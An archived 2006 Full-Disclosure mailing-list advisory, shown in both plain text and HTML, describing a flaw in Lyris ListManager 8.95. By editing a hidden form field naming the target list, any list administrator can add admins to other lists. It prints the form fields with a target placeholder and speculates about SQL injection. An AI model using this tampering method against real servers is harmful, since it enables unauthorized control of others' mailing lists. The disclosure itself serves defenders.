'[Full-disclosure] Lyris ListManager 8.95: Add arbitrary'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Lyris ListManager 8.95: Add arbitrary
From:       Design Properly <designsoftwareproperly () yahoo ! com>
Date:       2006-08-31 4:14:27
Message-ID: 20060831041427.10614.qmail () web58311 ! mail ! re3 ! yahoo ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Release Date: 2006-08-30
Application: Lyris ListManager 8.95
Risk: Depends upon your use and business context
Vendor site: http://www.lyris.com/

Overview of Product:
    "Lyris ListManager is the world's most popular software for creating, sending, and tracking \
highly effective email campaigns, newsletters, and discussion groups." \
http://www.lyris.com/products/index.html

Details of this Vulnerability:
    A design flaw in ListManager's web-based administrative interface allows anyone who is an \
administrator of a list on the server to add an arbitrary user as an administrator to any other \
list hosted on the same server.  Specifically, the form one fills out to add an administrator \
contains a hidden form field with the name of the list to which the administrator will be \
added.  By changing this value and submitting the form (using tools like TamperData for \
FireFox), you can add an arbitrary user as an administrator for an arbitrary list.

    Here is a sample of these hidden form fields:

    <!-- START OF - save cgi variables in hidden fields -->
    <input type="hidden" name="MEMBERS_.AppNeeded_" value="F">
    <input type="hidden" name="MEMBERS_.CleanAuto_" value="F">
    <input type="hidden" name="MEMBERS_.DateJoined_" value="2006-08-30 20:20:32">
    <input type="hidden" name="MEMBERS_.EnableWYSIWYG_" value="T">
    <input type="hidden" name="MEMBERS_.IsListAdm_" value="T">
    <input type="hidden" name="MEMBERS_.List_" value="[INSERT TARGET LIST HERE]">
    <input type="hidden" name="MEMBERS_.MailFormat_" value="M">
    <input type="hidden" name="MEMBERS_.MemberType_" value="normal">
    <input type="hidden" name="MEMBERS_.NoRepro_" value="F">
    <input type="hidden" name="MEMBERS_.NotifySubm_" value="T">
    <input type="hidden" name="MEMBERS_.NumAppNeed_" value="0">
    <input type="hidden" name="MEMBERS_.RcvAdmMail_" value="T">
    <input type="hidden" name="MEMBERS_.ReadsHtml_" value="F">
    <input type="hidden" name="MEMBERS_.ReceiveAck_" value="F">
    <input type="hidden" name="MEMBERS_.SubType_" value="mail">
    <input type="hidden" name="current_tab" value="Basics">
    <input type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_ PermissionGroupID_ \
MemberType_ SubType_ Password_ ExpireDate_ SubType_ CleanAuto_ NoRepro_ UserID_ Comment_ \
Additional_ ReceiveAck_ NumAppNeed_ List_ DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ \
DateHeld_ DateUnsub_ DateJoined_ UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ \
RcvAdmMail_ NotifySubm_">  <input type="hidden" name="table_in_memory" value="MEMBERS_">

Further Work:
    Yesterday I was trying to add a user whose name contained a single-quote, e.g. "O'Conner."  \
Frequently, as I navigated the web interface, I received SQL errors that printed a large \
portion of the SQL query along with details about what failed.  I'm sure there's SQL injection \
possibilities here as well, I just don't have time to explore.  And where there are SQL \
injection opportunities, there's often opportunities for JavaScript injection.

Recommendations to those using ListManager:
    The risk of this issue to your organization is directly tied to how many administrators you \
have on your mailing list server, how much you can really trust them, and the value of your \
mailing lists.  That is, a company that has five administrators for a public list shouldn't \
care.  However, if you've got a lot of administrators and a few lists whose discussions would \
be worth intercepting or disrupting, you're at high-risk for abuse as a result of this \
vulnerability.  Until the vendor solves this and other issues, you're going to have to have a \
high level of trust in the people administering your lists, or use a different mailing list \
server.    
Best of luck.

 				
---------------------------------
Want to be your own boss? Learn how on  Yahoo! Small Business. 


[Attachment #5 (text/html)]

Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list<br>Release \
Date: 2006-08-30<br>Application: Lyris ListManager 8.95<br>Risk: Depends upon your use and \
business context<br>Vendor site: http://www.lyris.com/<br><br>Overview of \
Product:<br>&nbsp;&nbsp;&nbsp; "Lyris ListManager is the world's most popular software for \
creating, sending, and tracking highly effective email campaigns, newsletters, and discussion \
groups." http://www.lyris.com/products/index.html<br><br>Details of this \
Vulnerability:<br>&nbsp;&nbsp;&nbsp; A design flaw in ListManager's web-based administrative \
interface allows anyone who is an administrator of a list on the server to add an arbitrary \
user as an administrator to any other list hosted on the same server.&nbsp; Specifically, the \
form one fills out to add an administrator contains a hidden form field with the name of the \
list to which the administrator will be added.&nbsp; By changing this value and submitting the \
form  (using tools like TamperData for FireFox), you can add an arbitrary user as an \
administrator for an arbitrary list.<br><br>&nbsp;&nbsp;&nbsp; Here is a sample of these hidden \
form fields:<br><br>&nbsp;&nbsp;&nbsp; &lt;!-- START OF - save cgi variables in hidden fields \
--&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" name="MEMBERS_.AppNeeded_" \
value="F"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" name="MEMBERS_.CleanAuto_" \
value="F"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" name="MEMBERS_.DateJoined_" \
value="2006-08-30 20:20:32"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" \
name="MEMBERS_.EnableWYSIWYG_" value="T"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" \
name="MEMBERS_.IsListAdm_" value="T"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" \
name="MEMBERS_.List_" value="[INSERT TARGET LIST HERE]"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.MailFormat_" value="M"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden"  name="MEMBERS_.MemberType_" value="normal"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.NoRepro_" value="F"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.NotifySubm_" value="T"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.NumAppNeed_" value="0"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.RcvAdmMail_" value="T"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.ReadsHtml_" value="F"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.ReceiveAck_" value="F"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="MEMBERS_.SubType_" value="mail"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="current_tab" value="Basics"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input \
type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_ PermissionGroupID_ \
MemberType_ SubType_ Password_ ExpireDate_ SubType_ CleanAuto_ NoRepro_ UserID_ Comment_ \
Additional_ ReceiveAck_ NumAppNeed_  List_ DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ \
DateHeld_ DateUnsub_ DateJoined_ UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ \
RcvAdmMail_ NotifySubm_"&gt;<br>&nbsp;&nbsp;&nbsp; &lt;input type="hidden" \
name="table_in_memory" value="MEMBERS_"&gt;<br><br>Further Work:<br>&nbsp;&nbsp;&nbsp; \
Yesterday I was trying to add a user whose name contained a single-quote, e.g. \
"O'Conner."&nbsp; Frequently, as I navigated the web interface, I received SQL errors that \
printed a large portion of the SQL query along with details about what failed.&nbsp; I'm sure \
there's SQL injection possibilities here as well, I just don't have time to explore.&nbsp; And \
where there are SQL injection opportunities, there's often opportunities for JavaScript \
injection.<br><br>Recommendations to those using ListManager:<br>&nbsp;&nbsp;&nbsp; The risk of \
this issue to your organization is directly tied to how many administrators you have on your \
mailing list server, how much you can really  trust them, and the value of your mailing \
lists.&nbsp; That is, a company that has five administrators for a public list shouldn't \
care.&nbsp; However, if you've got a lot of administrators and a few lists whose discussions \
would be worth intercepting or disrupting, you're at high-risk for abuse as a result of this \
vulnerability.&nbsp; Until the vendor solves this and other issues, you're going to have to \
have a high level of trust in the people administering your lists, or use a different mailing \
list server. &nbsp;<br>&nbsp;&nbsp; &nbsp;<br>Best of luck.<br><p>&#32;  
	
		<hr size=1>Want to be your own boss? Learn how on <a \
href="http://us.rd.yahoo.com/evt=41244/*http://smallbusiness.yahoo.com/r-index"> Yahoo! Small \
Business.</a> 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic